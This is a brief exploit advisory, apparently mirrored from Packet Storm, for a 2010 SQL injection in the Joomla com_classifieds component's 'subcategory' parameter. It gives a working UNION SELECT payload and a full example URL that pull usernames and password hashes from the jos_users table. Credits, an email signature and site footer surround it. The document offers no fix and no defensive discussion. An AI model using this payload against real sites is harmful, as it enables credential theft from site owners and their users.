The Joomla Classifieds component suffers from a remote SQL injection vulnerability.
030040aaaaaedccea01bd270fc0a5ef98e4a8e5a52040699b5b161080dfcdafe
[!] Title: Joomla Component com_classifieds ( subcategory ) SQL
Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!]
Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!]
ExploiT :
0+and+1=2+UnioN/**/SeLeCT/**/concat_ws(username,0x3a,password)/**/from/**/jos_users/**/--
[!]
Example :
http://localhost.free/index.php?option=com_classifieds&act=providers&task=details&cid=2122&category=0&subcategory=0+and+1=2+UnioN/**/SeLeCT/**/concat_ws(username,0x3a,password)/**/from/**/jos_users/**/--
[+]########################################################################################################################################################[+]
[!]
Th4nks : Fantastik, MitolocyA, ISYAN,
[!] Ege'nin sözü : En
iyi yol, bildigin yoldur.
_________________________________________________________________
Hareket Halindeyken E-postanız ve Çok Daha Fazlası. Windows Live Hotmail'i Ücretsiz Edinin.
https://signup.live.com/signup.aspx?id=60969
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed